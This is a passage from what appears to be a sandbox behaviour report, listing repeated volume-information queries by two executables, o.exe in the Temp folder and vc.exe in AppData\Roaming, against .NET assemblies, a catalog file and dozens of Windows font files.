Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Users\user\AppData\Roaming\vc.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
